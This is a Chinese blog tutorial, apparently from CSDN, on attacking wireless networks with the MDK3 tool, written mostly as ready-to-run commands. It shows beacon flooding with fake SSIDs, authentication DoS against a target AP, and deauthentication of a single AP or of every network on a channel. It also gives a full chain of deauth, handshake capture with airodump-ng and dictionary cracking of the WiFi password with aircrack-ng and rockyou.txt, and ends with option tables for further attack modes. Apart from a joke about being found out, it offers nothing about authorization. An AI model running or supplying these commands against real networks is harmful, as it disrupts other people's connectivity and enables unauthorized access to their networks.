好玩的AP扰乱MDK3

MDK3

MDK3 是一款无线DOS 攻击测试工具,能够发起Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok 等模式的攻击,另外它还具有针对隐藏ESSID 的暴力探测模式、802.1X 渗透测试等功能

安装MDK3

sudo apt-get install mdk3

准备工作

连接网卡:

ifconfig  # 查找一个网卡 假如是wlan0

切换网卡为监听模式(monitor):

airmon-ng start wlan0

AP扫描:

airmon-ng  wlan0

mdk3创建虚拟wifi

创建一个虚拟wifi

输入下面命令来创建一个叫做“test_wifi”虚拟wifi。

mdk3 wlan0mon b -n test_wifi
或
sudo mdk3 wlan0mon b -n 测试test_wifi -t -c 6 -s 80

b -n:指定wifi名字

创建大量虚拟wifi

输入下面命令来创建大量在信道为1随机名字的wifi

mdk3 wlan0mon b -g -c 1

不一会,就创建了几十个wifi。

该命令会在无线接口 wlan0mon 上使用 Beacon Flood Mode(信标洪泛模式)攻击,

目标为 BSSID 地址为 b,

攻击信道为 1。

其中 -g 参数表示使用泛洪模式,

即不断发送带有随机 SSID 和 MAC 地址的信标广播包,以干扰目标网络。通过这种方式可以使目标AP在所有连接设备之外都变得不可用,从而对目标网络造成干扰或攻击。

读取本地文件创建

names.txt​ 内容

白日依山尽
黄河入海流
欲穷千里目
更上一层楼
mdk3 wlan0mon b -f /root/names.txt -c 6 -s 1000

该命令会在无线接口 wlan0mon 上使用 Beacon Flood Mode(信标洪泛模式)攻击,目标为随机 BSSID,攻击信道为 6,同时将随机生成的 SSID 使用 /root/names.txt 文件中的内容进行替换,1000ms。可以通过这种方式向附近的设备广播大量的热点信息,以干扰和误导目标网络的用户。

扫描连接wifi的设备

使用下面命令可以扫描连接wifi的设备。请自行替换目标wifi名字

mdk3 wlan0mon w -e <SSID>

向指定AP进行Dos攻击

这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应;这个模式常见的使用是在reaver穷据路由PIN码,当遇到AP被“pin死”时,可以用这个模式来直接让AP停止正常响应,迫使AP主人重启路由,对于有些路由器防DOS的这个不好用。

输入下面命令,向指定AP发起DOS攻击。请自行替换目标MAC地址。

mdk3 wlan0mon a -a [MAC]

这个攻击对于我的路由器貌似没什么效果,可能是我的路由器防DoS或者是攻击时间太短请求都能够正常处理。

向指定AP发起取消认证攻击

攻击单一Ap

使用以下命令可以强制解除验证解除连接的设备。请自行替换目标MAC地址

mdk3 wlan0mon d 76:87:4E:74:34:06

该命令使用MDK3的Deauthentication Mode(强制下线模式)针对指定的MAC地址(76:87:4E:74:34:06)进行攻击。在攻击期间,MDK3会发送大量的deauth帧,以迫使目标设备断开与Wi-Fi网络的连接。

信道(ch)攻击AP

在这个模式下,软件会向周围所有可见AP发起循环攻击…可以造成一定范围内的无线网络瘫痪(当然有白名单,黑名单模式),直到手动停止攻击

mdk3 wlan0mon d -c 11 

该命令使用MDK3的Deauthentication Mode(强制下线模式)对Wi-Fi信道11上所有连接的设备进行攻击。在攻击期间,MDK3会发送大量的deauth帧,以迫使目标设备断开与Wi-Fi网络的连接。

快ctrl c停止,不然别人来找你了!

mdk3实现无线网络攻击

步骤一:使用mdk3强制解除验证解除连接的设备

利用mdk3对指定AP进行攻击,发送取消认证数据包,解除连接在AP上的设备

mdk3 wlan0mon d 76:87:4E:74:34:06

这个时候wifi已经连接失败!

步骤二:获取握手数据包
airodump-ng  -c 1 --bssid 76:87:4E:74:34:06 -w /home/gyp-202031070222/桌面/wifi2 wlan0mon

步骤三:密码字典破解wifi密码
aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/gyp-202031070222/桌面/wifi2-01.cap

其实原理和之前的deauth攻击差不多,让其断开连接后获取握手数据包,然后密码字典破解

模式

b:伪造 AP

发射伪造的AP,可能造成网络扫描程序或者驱动程序崩溃

参数说明
-n [ssid]指定ssid,否则随机生产
-f [filename]从文件中读取 SSID 列表
-v [filename]从文件中读取 SSID 和 MAC 地址列表
-d显示站点为点对点(Ad-Hoc)
-w设置热点为 WEP 加密模式
-g显示站点为 54 Mbit
-t显示站点为 WPA TKIP 加密
-a显示站点为 WPE AES 加密
-m使用 OUI 数据库的有效 MAC 地址
-h伪造则信道跳动,测试某些设备和驱动,但信道跳动会降低分组速率
-c [chan]在此信道伪造 AP,如果你想让你的网卡跳到这个信道则必须设置 -h
-s [pps]每秒发包速率,默认为50
a:身份验证 DoS

身份验证 DoS 攻击

参数说明
-a [ap_mac]只攻击指定 MAC 的 AP
-m使用 OUI 数据库的有效 MAC 地址
-c不检测是否成功
-i [ap_mac]在AP 上智能测试,-a 和 -c 选项将忽略
-s [pps]发包率,默认不限制
p:ESSID 穷举

基本侦测和ESSID穷举

参数说明
-e [ssid]指定 SSID
-f [filename]从文件读取 SSID 并且 BF 算法匹配隐藏的 SSID(BF=Brute force)
-t [bssid]设置目标 AP 的 MAC 地址
-s [pps]发包率,默认无限制,BF 为 300
-b [character set]字符集,使用完整的 BF 模式(建议仅使用Short SSIDs)制
d:掉线攻击

解除认证,强迫连接 AP 的每台设备掉线

参数说明
-w [filename]白名单 MAC 地址文件,免受攻击
-b [filename]黑名单 MAC 地址文件,攻击对象
-s [pps]发包率,默认不限制
-c [chan,chan,chan,…]信道跳动,每5秒一次
m:取消流量

Michael shutdown,连续取消所有流量

参数说明
-t [bssid]设置目标 AP 的 MAC 地址
-w [seconds]每次爆破间隔时间,默认10秒
-n [ppb]每次爆破发送包,默认70
-j使用新的 TKIP Qos-Exploit,仅需要几个包就可以关闭 AP
-s [pps]发包率,默认400
w:扰乱路由表

WIDS / WIPS / WDS 多认证搅乱路由表

参数说明
-e [ssid]AP SSID
-c [chan,chan,chan…]信道
-z [ppb]激活 Zero_Chaos’WIDS 开发
f:MAC 暴力破解

MAC 地址过滤暴力破解。对已知的客户端 MAC 地址尝试在动态变化时对给定 AP 进行身份验证

参数说明
-t [bssid]BSSID
-m [mac]设置 MAC 地址使用范围(3 bytes,i.e. 00:12:34)没有 -m 选项将使用内部数据库
-f [mac]设置 MAC 地址的开始,-f 和 -m 不能同时使用
g:WPA 降级测试

WPA 降级测试,不验证站点和 AP 发送 WPA 加密的数据包,尝试设置为 WPE 加密或者不加密,mdk3 会让 WPE 或者未加密的客户端工作

参数说明
-t [bssid]BSSID
  • 20
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tonicGB

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值